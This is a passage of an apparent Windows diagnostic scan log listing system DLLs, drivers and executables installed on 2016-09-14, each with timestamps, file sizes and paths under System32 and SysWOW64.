    2016-09-14 01:10 - 2016-08-31 22:23 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 22:08 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 21:59 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 21:57 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inseng.dll
    2016-09-14 01:10 - 2016-08-31 21:53 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
    2016-09-14 01:10 - 2016-08-31 21:52 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 21:48 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 21:45 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\occache.dll
    2016-09-14 01:10 - 2016-08-31 21:34 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 21:30 - 00692736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 21:29 - 02055680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 21:29 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 21:27 - 13808128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 21:24 - 04607488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:45 - 25770496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 20:43 - 02445824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-09-14 01:10 - 2016-08-31 20:42 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-31 20:40 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 20:40 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollectorres.dll
    2016-09-14 01:10 - 2016-08-31 20:38 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 20:25 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 02894336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00576000 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
    2016-09-14 01:10 - 2016-08-31 20:24 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 20:16 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 20:15 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 20:12 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
    2016-09-14 01:10 - 2016-08-31 20:11 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 20:11 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollector.exe
    2016-09-14 01:10 - 2016-08-31 20:10 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
    2016-09-14 01:10 - 2016-08-31 20:10 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 20:06 - 06047232 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:03 - 00968704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.exe
    2016-09-14 01:10 - 2016-08-31 19:59 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 19:51 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 19:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
    2016-09-14 01:10 - 2016-08-31 19:47 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
    2016-09-14 01:10 - 2016-08-31 19:46 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 19:44 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 19:42 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\system32\occache.dll
    2016-09-14 01:10 - 2016-08-31 19:31 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 19:29 - 00724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2016-09-14 01:10 - 2016-08-31 19:28 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 19:27 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 19:26 - 02131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 19:15 - 15411712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 19:10 - 02921472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-09-14 01:10 - 2016-08-31 18:58 - 01550848 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 18:47 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-12 12:26 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
    2016-09-14 01:09 - 2016-09-02 11:40 - 00631176 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 05548264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:35 - 00706280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 00154856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
    2016-09-14 01:09 - 2016-09-02 11:35 - 00095464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
    2016-09-14 01:09 - 2016-09-02 11:34 - 01732864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01464320 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01212928 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01163264 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\system32\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00419840 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00312320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidsvc.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:21 - 04000488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntkrnlpa.exe
    2016-09-14 01:09 - 2016-09-02 11:21 - 03944680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:18 - 01314112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 01114112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00666112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00553472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:02 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidpolicyconverter.exe
    2016-09-14 01:09 - 2016-09-02 11:02 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
    2016-09-14 01:09 - 2016-09-02 11:02 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
    2016-09-14 01:09 - 2016-09-02 11:01 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:58 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\conhost.exe
    2016-09-14 01:09 - 2016-09-02 10:57 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rstrui.exe
    2016-09-14 01:09 - 2016-09-02 10:55 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00291328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
    2016-09-14 01:09 - 2016-09-02 10:53 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
    2016-09-14 01:09 - 2016-09-02 10:48 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-08-16 13:36 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:48 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:35 - 03218432 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2016-09-14 01:09 - 2016-08-06 11:31 - 00877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
    2016-09-14 01:09 - 2016-08-06 11:15 - 00581632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
    2016-09-14 01:09 - 2016-07-07 11:36 - 01896168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00377576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00287976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
    2016-09-14 01:09 - 2016-07-07 11:08 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpipreg.sys
    2016-09-14 01:09 - 2016-07-01 11:31 - 00976896 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:31 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\INETRES.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00741888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\INETRES.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 01483264 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00190976 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptsvc.dll
